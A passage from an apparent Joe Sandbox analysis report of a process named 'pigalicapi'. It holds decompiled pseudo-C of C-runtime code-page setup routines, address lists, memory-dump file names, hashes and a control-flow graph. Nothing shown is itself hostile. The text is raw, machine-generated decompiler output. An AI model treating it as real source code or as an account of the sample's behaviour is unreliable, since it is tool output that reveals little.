                                                                                                                                                                                                                                                                      					_t68 = _t67 - _t96;
                                                                                                                                                                                                                                                                      					__eflags = _t68;
                                                                                                                                                                                                                                                                      					_v1828 = _t68;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						_t97 = _t96 + _t90;
                                                                                                                                                                                                                                                                      						_t69 = _t68 + _t97;
                                                                                                                                                                                                                                                                      						_v1824 = _t69;
                                                                                                                                                                                                                                                                      						__eflags = _t69 + 0x20 - 0x19;
                                                                                                                                                                                                                                                                      						if(_t69 + 0x20 > 0x19) {
                                                                                                                                                                                                                                                                      							__eflags = _v1824 - 0x19;
                                                                                                                                                                                                                                                                      							if(_v1824 > 0x19) {
                                                                                                                                                                                                                                                                      								 *_t97 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t72 = _t101 + _t90;
                                                                                                                                                                                                                                                                      								_t57 = _t72 + 0x19;
                                                                                                                                                                                                                                                                      								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                                      								__eflags =  *_t57;
                                                                                                                                                                                                                                                                      								_t59 = _t90 - 0x20; // -32
                                                                                                                                                                                                                                                                      								_t73 = _t59;
                                                                                                                                                                                                                                                                      								goto L24;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                                      							_t54 = _t90 + 0x20; // 0x20
                                                                                                                                                                                                                                                                      							_t73 = _t54;
                                                                                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                                                                                      							 *_t97 = _t73;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t68 = _v1828;
                                                                                                                                                                                                                                                                      						_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                                      						_t90 = _t90 + 1;
                                                                                                                                                                                                                                                                      						__eflags = _t90 - 0x100;
                                                                                                                                                                                                                                                                      					} while (_t90 < 0x100);
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t74 = 0;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
                                                                                                                                                                                                                                                                      						_t74 = _t74 + 1;
                                                                                                                                                                                                                                                                      					} while (_t74 < 0x100);
                                                                                                                                                                                                                                                                      					_t75 = _v1814;
                                                                                                                                                                                                                                                                      					_t93 =  &_v1814;
                                                                                                                                                                                                                                                                      					_v264 = 0x20;
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						_t108 = _t75;
                                                                                                                                                                                                                                                                      						if(_t75 == 0) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t95 =  *(_t93 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                      						_t76 = _t75 & 0x000000ff;
                                                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                                                      							__eflags = _t76 - _t95;
                                                                                                                                                                                                                                                                      							if(_t76 > _t95) {
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t76 - 0x100;
                                                                                                                                                                                                                                                                      							if(_t76 < 0x100) {
                                                                                                                                                                                                                                                                      								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
                                                                                                                                                                                                                                                                      								_t76 = _t76 + 1;
                                                                                                                                                                                                                                                                      								__eflags = _t76;
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t93 = _t93 + 2;
                                                                                                                                                                                                                                                                      						__eflags = _t93;
                                                                                                                                                                                                                                                                      						_t75 =  *_t93;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					E00FBA4FD(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                                      					E00FBCAA6(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0); // executed
                                                                                                                                                                                                                                                                      					E00FBCAA6(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                                      					_t94 = 0;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
                                                                                                                                                                                                                                                                      						if((_t86 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                      							__eflags = _t86 & 0x00000002;
                                                                                                                                                                                                                                                                      							if((_t86 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                      								 *((char*)(_t101 + _t94 + 0x119)) = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t37 = _t101 + _t94 + 0x19;
                                                                                                                                                                                                                                                                      								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                                      								__eflags =  *_t37;
                                                                                                                                                                                                                                                                      								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
                                                                                                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
                                                                                                                                                                                                                                                                      							L15:
                                                                                                                                                                                                                                                                      							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                      					} while (_t94 < 0x100);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return E00FBDC5F(_v8 ^ _t102);
                                                                                                                                                                                                                                                                      			}































                                                                                                                                                                                                                                                                      0x00fbb225
                                                                                                                                                                                                                                                                      0x00fbb230
                                                                                                                                                                                                                                                                      0x00fbb237
                                                                                                                                                                                                                                                                      0x00fbb23c
                                                                                                                                                                                                                                                                      0x00fbb259
                                                                                                                                                                                                                                                                      0x00fbb351
                                                                                                                                                                                                                                                                      0x00fbb357
                                                                                                                                                                                                                                                                      0x00fbb359
                                                                                                                                                                                                                                                                      0x00fbb35a
                                                                                                                                                                                                                                                                      0x00fbb35a
                                                                                                                                                                                                                                                                      0x00fbb35c
                                                                                                                                                                                                                                                                      0x00fbb362
                                                                                                                                                                                                                                                                      0x00fbb362
                                                                                                                                                                                                                                                                      0x00fbb364
                                                                                                                                                                                                                                                                      0x00fbb366
                                                                                                                                                                                                                                                                      0x00fbb36f
                                                                                                                                                                                                                                                                      0x00fbb372
                                                                                                                                                                                                                                                                      0x00fbb37e
                                                                                                                                                                                                                                                                      0x00fbb385
                                                                                                                                                                                                                                                                      0x00fbb395
                                                                                                                                                                                                                                                                      0x00fbb387
                                                                                                                                                                                                                                                                      0x00fbb387
                                                                                                                                                                                                                                                                      0x00fbb38a
                                                                                                                                                                                                                                                                      0x00fbb38a
                                                                                                                                                                                                                                                                      0x00fbb38a
                                                                                                                                                                                                                                                                      0x00fbb38e
                                                                                                                                                                                                                                                                      0x00fbb38e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb38e
                                                                                                                                                                                                                                                                      0x00fbb374
                                                                                                                                                                                                                                                                      0x00fbb374
                                                                                                                                                                                                                                                                      0x00fbb379
                                                                                                                                                                                                                                                                      0x00fbb379
                                                                                                                                                                                                                                                                      0x00fbb391
                                                                                                                                                                                                                                                                      0x00fbb391
                                                                                                                                                                                                                                                                      0x00fbb391
                                                                                                                                                                                                                                                                      0x00fbb397
                                                                                                                                                                                                                                                                      0x00fbb39d
                                                                                                                                                                                                                                                                      0x00fbb3a3
                                                                                                                                                                                                                                                                      0x00fbb3a4
                                                                                                                                                                                                                                                                      0x00fbb3a4
                                                                                                                                                                                                                                                                      0x00fbb25f
                                                                                                                                                                                                                                                                      0x00fbb25f
                                                                                                                                                                                                                                                                      0x00fbb261
                                                                                                                                                                                                                                                                      0x00fbb261
                                                                                                                                                                                                                                                                      0x00fbb268
                                                                                                                                                                                                                                                                      0x00fbb269
                                                                                                                                                                                                                                                                      0x00fbb26d
                                                                                                                                                                                                                                                                      0x00fbb273
                                                                                                                                                                                                                                                                      0x00fbb279
                                                                                                                                                                                                                                                                      0x00fbb2a1
                                                                                                                                                                                                                                                                      0x00fbb2a1
                                                                                                                                                                                                                                                                      0x00fbb2a3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb282
                                                                                                                                                                                                                                                                      0x00fbb286
                                                                                                                                                                                                                                                                      0x00fbb298
                                                                                                                                                                                                                                                                      0x00fbb298
                                                                                                                                                                                                                                                                      0x00fbb29a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb28b
                                                                                                                                                                                                                                                                      0x00fbb28d
                                                                                                                                                                                                                                                                      0x00fbb28f
                                                                                                                                                                                                                                                                      0x00fbb297
                                                                                                                                                                                                                                                                      0x00fbb297
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb297
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb28d
                                                                                                                                                                                                                                                                      0x00fbb29c
                                                                                                                                                                                                                                                                      0x00fbb29c
                                                                                                                                                                                                                                                                      0x00fbb29f
                                                                                                                                                                                                                                                                      0x00fbb29f
                                                                                                                                                                                                                                                                      0x00fbb2bb
                                                                                                                                                                                                                                                                      0x00fbb2dc
                                                                                                                                                                                                                                                                      0x00fbb304
                                                                                                                                                                                                                                                                      0x00fbb30c
                                                                                                                                                                                                                                                                      0x00fbb30e
                                                                                                                                                                                                                                                                      0x00fbb30e
                                                                                                                                                                                                                                                                      0x00fbb318
                                                                                                                                                                                                                                                                      0x00fbb328
                                                                                                                                                                                                                                                                      0x00fbb32a
                                                                                                                                                                                                                                                                      0x00fbb341
                                                                                                                                                                                                                                                                      0x00fbb32c
                                                                                                                                                                                                                                                                      0x00fbb32c
                                                                                                                                                                                                                                                                      0x00fbb32c
                                                                                                                                                                                                                                                                      0x00fbb32c
                                                                                                                                                                                                                                                                      0x00fbb331
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb331
                                                                                                                                                                                                                                                                      0x00fbb31a
                                                                                                                                                                                                                                                                      0x00fbb31a
                                                                                                                                                                                                                                                                      0x00fbb31f
                                                                                                                                                                                                                                                                      0x00fbb338
                                                                                                                                                                                                                                                                      0x00fbb338
                                                                                                                                                                                                                                                                      0x00fbb338
                                                                                                                                                                                                                                                                      0x00fbb348
                                                                                                                                                                                                                                                                      0x00fbb349
                                                                                                                                                                                                                                                                      0x00fbb34d
                                                                                                                                                                                                                                                                      0x00fbb3b8

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Info
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                                      • Opcode ID: 167998eaaf530622da69c5201d0e6a9d7d50dfd6a4d5cdabec30311e32ae6ce3
                                                                                                                                                                                                                                                                      • Instruction ID: 8d129e19a6790a1fbbed5050dfbb1ee7d9eda35a79a63b4be4b37e4d58ce378c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 167998eaaf530622da69c5201d0e6a9d7d50dfd6a4d5cdabec30311e32ae6ce3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2412B7190434C9ADB228F66CC84BFABBE9EF55304F1804ECE5CA87142D3759A45EF60
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 155 fbb57a-fbb59e call fbb14d 158 fbb5ae-fbb5b5 155->158 159 fbb5a0-fbb5a9 call fbb1c0 155->159 160 fbb5b8-fbb5be 158->160 167 fbb75b-fbb76a call fbdc5f 159->167 162 fbb6ae-fbb6cd call fbf070 160->162 163 fbb5c4-fbb5d0 160->163 175 fbb6d0-fbb6d5 162->175 163->160 165 fbb5d2-fbb5d8 163->165 169 fbb5de-fbb5e4 165->169 170 fbb6a6-fbb6a9 165->170 169->170 173 fbb5ea-fbb5f6 IsValidCodePage 169->173 174 fbb75a 170->174 173->170 176 fbb5fc-fbb609 GetCPInfo 173->176 174->167 177 fbb70c-fbb716 175->177 178 fbb6d7-fbb6dc 175->178 181 fbb60f-fbb630 call fbf070 176->181 182 fbb693-fbb699 176->182 177->175 183 fbb718-fbb73f call fbb10f 177->183 179 fbb709 178->179 180 fbb6de-fbb6e4 178->180 179->177 184 fbb6fd-fbb6ff 180->184 194 fbb683 181->194 195 fbb632-fbb639 181->195 182->170 186 fbb69b-fbb6a1 call fbb1c0 182->186 197 fbb740-fbb74f 183->197 188 fbb701-fbb707 184->188 189 fbb6e6-fbb6ec 184->189 201 fbb757-fbb758 186->201 188->178 188->179 189->188 193 fbb6ee-fbb6f9 189->193 193->184 198 fbb686-fbb68e 194->198 199 fbb63b-fbb640 195->199 200 fbb65c-fbb65f 195->200 197->197 202 fbb751-fbb752 call fbb225 197->202 198->202 199->200 204 fbb642-fbb648 199->204 203 fbb664-fbb66b 200->203 201->174 202->201 203->203 206 fbb66d-fbb681 call fbb10f 203->206 207 fbb650-fbb652 204->207 206->198 209 fbb64a-fbb64f 207->209 210 fbb654-fbb65a 207->210 209->207 210->199 210->200
                                                                                                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                                                                                                      			E00FBB57A(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				char _v22;
                                                                                                                                                                                                                                                                      				struct _cpinfo _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                                                                                      				int _t51;
                                                                                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                                                                                      				short _t58;
                                                                                                                                                                                                                                                                      				signed char _t62;
                                                                                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                                                                                      				signed char* _t72;
                                                                                                                                                                                                                                                                      				signed char* _t73;
                                                                                                                                                                                                                                                                      				int _t78;
                                                                                                                                                                                                                                                                      				signed int _t81;
                                                                                                                                                                                                                                                                      				signed char* _t82;
                                                                                                                                                                                                                                                                      				short* _t83;
                                                                                                                                                                                                                                                                      				int _t87;
                                                                                                                                                                                                                                                                      				signed char _t88;
                                                                                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                                                                                      				signed int _t91;
                                                                                                                                                                                                                                                                      				signed int _t92;
                                                                                                                                                                                                                                                                      				int _t94;
                                                                                                                                                                                                                                                                      				int _t95;
                                                                                                                                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                                                                                                                                      				signed int _t99;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t48 =  *0x104dd74; // 0xfe5fa47e
                                                                                                                                                                                                                                                                      				_v8 = _t48 ^ _t99;
                                                                                                                                                                                                                                                                      				_t98 = _a8;
                                                                                                                                                                                                                                                                      				_t78 = E00FBB14D(__eflags, _a4);
                                                                                                                                                                                                                                                                      				if(_t78 != 0) {
                                                                                                                                                                                                                                                                      					_t94 = 0;
                                                                                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                                                                                      					_t81 = 0;
                                                                                                                                                                                                                                                                      					_t51 = 0;
                                                                                                                                                                                                                                                                      					_v32 = 0;
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						__eflags =  *((intOrPtr*)(_t51 + 0x104d7e8)) - _t78;
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t51 + 0x104d7e8)) == _t78) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                      						_t51 = _t51 + 0x30;
                                                                                                                                                                                                                                                                      						_v32 = _t81;
                                                                                                                                                                                                                                                                      						__eflags = _t51 - 0xf0;
                                                                                                                                                                                                                                                                      						if(_t51 < 0xf0) {
                                                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							__eflags = _t78 - 0xfde8;
                                                                                                                                                                                                                                                                      							if(_t78 == 0xfde8) {
                                                                                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								__eflags = _t78 - 0xfde9;
                                                                                                                                                                                                                                                                      								if(_t78 == 0xfde9) {
                                                                                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                                                                                                                                                                                                                                                                      									__eflags = _t51;
                                                                                                                                                                                                                                                                      									if(_t51 == 0) {
                                                                                                                                                                                                                                                                      										goto L23;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_t51 = GetCPInfo(_t78,  &_v28);
                                                                                                                                                                                                                                                                      										__eflags = _t51;
                                                                                                                                                                                                                                                                      										if(_t51 == 0) {
                                                                                                                                                                                                                                                                      											__eflags =  *0x104e17c - _t94; // 0x0
                                                                                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                                                                                      												goto L23;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												E00FBB1C0(_t98);
                                                                                                                                                                                                                                                                      												goto L37;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											E00FBF070(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                                      											 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                                      											 *(_t98 + 0x21c) = _t94;
                                                                                                                                                                                                                                                                      											_t78 = 1;
                                                                                                                                                                                                                                                                      											__eflags = _v28 - 1;
                                                                                                                                                                                                                                                                      											if(_v28 <= 1) {
                                                                                                                                                                                                                                                                      												 *(_t98 + 8) = _t94;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												__eflags = _v22;
                                                                                                                                                                                                                                                                      												_t72 =  &_v22;
                                                                                                                                                                                                                                                                      												if(_v22 != 0) {
                                                                                                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                                                                                                      														_t88 = _t72[1];
                                                                                                                                                                                                                                                                      														__eflags = _t88;
                                                                                                                                                                                                                                                                      														if(_t88 == 0) {
                                                                                                                                                                                                                                                                      															goto L16;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														_t91 = _t88 & 0x000000ff;
                                                                                                                                                                                                                                                                      														_t89 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                                                                                      														while(1) {
                                                                                                                                                                                                                                                                      															__eflags = _t89 - _t91;
                                                                                                                                                                                                                                                                      															if(_t89 > _t91) {
                                                                                                                                                                                                                                                                      																break;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
                                                                                                                                                                                                                                                                      															_t89 = _t89 + 1;
                                                                                                                                                                                                                                                                      															__eflags = _t89;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														_t72 =  &(_t72[2]);
                                                                                                                                                                                                                                                                      														__eflags =  *_t72;
                                                                                                                                                                                                                                                                      														if( *_t72 != 0) {
                                                                                                                                                                                                                                                                      															continue;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														goto L16;
                                                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      												L16:
                                                                                                                                                                                                                                                                      												_t73 = _t98 + 0x1a;
                                                                                                                                                                                                                                                                      												_t87 = 0xfe;
                                                                                                                                                                                                                                                                      												do {
                                                                                                                                                                                                                                                                      													 *_t73 =  *_t73 | 0x00000008;
                                                                                                                                                                                                                                                                      													_t73 =  &(_t73[1]);
                                                                                                                                                                                                                                                                      													_t87 = _t87 - 1;
                                                                                                                                                                                                                                                                      													__eflags = _t87;
                                                                                                                                                                                                                                                                      												} while (_t87 != 0);
                                                                                                                                                                                                                                                                      												 *(_t98 + 0x21c) = E00FBB10F( *(_t98 + 4));
                                                                                                                                                                                                                                                                      												 *(_t98 + 8) = _t78;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_t95 = _t98 + 0xc;
                                                                                                                                                                                                                                                                      											asm("stosd");
                                                                                                                                                                                                                                                                      											asm("stosd");
                                                                                                                                                                                                                                                                      											asm("stosd");
                                                                                                                                                                                                                                                                      											L36:
                                                                                                                                                                                                                                                                      											E00FBB225(_t78, _t91, _t95, _t98, _t98); // executed
                                                                                                                                                                                                                                                                      											L37:
                                                                                                                                                                                                                                                                      											__eflags = 0;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					E00FBF070(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                                      					_t54 = _v32 * 0x30;
                                                                                                                                                                                                                                                                      					__eflags = _t54;
                                                                                                                                                                                                                                                                      					_v36 = _t54;
                                                                                                                                                                                                                                                                      					_t55 = _t54 + 0x104d7f8;
                                                                                                                                                                                                                                                                      					_v32 = _t55;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						__eflags =  *_t55;
                                                                                                                                                                                                                                                                      						_t82 = _t55;
                                                                                                                                                                                                                                                                      						if( *_t55 != 0) {
                                                                                                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                                                                                                      								_t62 = _t82[1];
                                                                                                                                                                                                                                                                      								__eflags = _t62;
                                                                                                                                                                                                                                                                      								if(_t62 == 0) {
                                                                                                                                                                                                                                                                      									break;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t92 =  *_t82 & 0x000000ff;
                                                                                                                                                                                                                                                                      								_t63 = _t62 & 0x000000ff;
                                                                                                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                                                                                                      									__eflags = _t92 - _t63;
                                                                                                                                                                                                                                                                      									if(_t92 > _t63) {
                                                                                                                                                                                                                                                                      										break;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									__eflags = _t92 - 0x100;
                                                                                                                                                                                                                                                                      									if(_t92 < 0x100) {
                                                                                                                                                                                                                                                                      										_t31 = _t94 + 0x104d7e4; // 0x8040201
                                                                                                                                                                                                                                                                      										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
                                                                                                                                                                                                                                                                      										_t92 = _t92 + 1;
                                                                                                                                                                                                                                                                      										__eflags = _t92;
                                                                                                                                                                                                                                                                      										_t63 = _t82[1] & 0x000000ff;
                                                                                                                                                                                                                                                                      										continue;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									break;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t82 =  &(_t82[2]);
                                                                                                                                                                                                                                                                      								__eflags =  *_t82;
                                                                                                                                                                                                                                                                      								if( *_t82 != 0) {
                                                                                                                                                                                                                                                                      									continue;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t55 = _v32;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                      						_t55 = _t55 + 8;
                                                                                                                                                                                                                                                                      						_v32 = _t55;
                                                                                                                                                                                                                                                                      						__eflags = _t94 - 4;
                                                                                                                                                                                                                                                                      					} while (_t94 < 4);
                                                                                                                                                                                                                                                                      					 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                                      					 *(_t98 + 8) = 1;
                                                                                                                                                                                                                                                                      					 *(_t98 + 0x21c) = E00FBB10F(_t78);
                                                                                                                                                                                                                                                                      					_t83 = _t98 + 0xc;
                                                                                                                                                                                                                                                                      					_t91 = _v36 + 0x104d7ec;
                                                                                                                                                                                                                                                                      					_t95 = 6;
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						_t58 =  *_t91;
                                                                                                                                                                                                                                                                      						_t91 = _t91 + 2;
                                                                                                                                                                                                                                                                      						 *_t83 = _t58;
                                                                                                                                                                                                                                                                      						_t83 = _t83 + 2;
                                                                                                                                                                                                                                                                      						_t95 = _t95 - 1;
                                                                                                                                                                                                                                                                      						__eflags = _t95;
                                                                                                                                                                                                                                                                      					} while (_t95 != 0);
                                                                                                                                                                                                                                                                      					goto L36;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					E00FBB1C0(_t98);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				L39:
                                                                                                                                                                                                                                                                      				return E00FBDC5F(_v8 ^ _t99);
                                                                                                                                                                                                                                                                      			}






























                                                                                                                                                                                                                                                                      0x00fbb582
                                                                                                                                                                                                                                                                      0x00fbb589
                                                                                                                                                                                                                                                                      0x00fbb591
                                                                                                                                                                                                                                                                      0x00fbb599
                                                                                                                                                                                                                                                                      0x00fbb59e
                                                                                                                                                                                                                                                                      0x00fbb5af
                                                                                                                                                                                                                                                                      0x00fbb5af
                                                                                                                                                                                                                                                                      0x00fbb5b1
                                                                                                                                                                                                                                                                      0x00fbb5b3
                                                                                                                                                                                                                                                                      0x00fbb5b5
                                                                                                                                                                                                                                                                      0x00fbb5b8
                                                                                                                                                                                                                                                                      0x00fbb5b8
                                                                                                                                                                                                                                                                      0x00fbb5be
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb5c4
                                                                                                                                                                                                                                                                      0x00fbb5c5
                                                                                                                                                                                                                                                                      0x00fbb5c8
                                                                                                                                                                                                                                                                      0x00fbb5cb
                                                                                                                                                                                                                                                                      0x00fbb5d0
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb5d2
                                                                                                                                                                                                                                                                      0x00fbb5d2
                                                                                                                                                                                                                                                                      0x00fbb5d8
                                                                                                                                                                                                                                                                      0x00fbb6a6
                                                                                                                                                                                                                                                                      0x00fbb5de
                                                                                                                                                                                                                                                                      0x00fbb5de
                                                                                                                                                                                                                                                                      0x00fbb5e4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb5ea
                                                                                                                                                                                                                                                                      0x00fbb5ee
                                                                                                                                                                                                                                                                      0x00fbb5f4
                                                                                                                                                                                                                                                                      0x00fbb5f6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb5fc
                                                                                                                                                                                                                                                                      0x00fbb601
                                                                                                                                                                                                                                                                      0x00fbb607
                                                                                                                                                                                                                                                                      0x00fbb609
                                                                                                                                                                                                                                                                      0x00fbb693
                                                                                                                                                                                                                                                                      0x00fbb699
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb69b
                                                                                                                                                                                                                                                                      0x00fbb69c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb69c
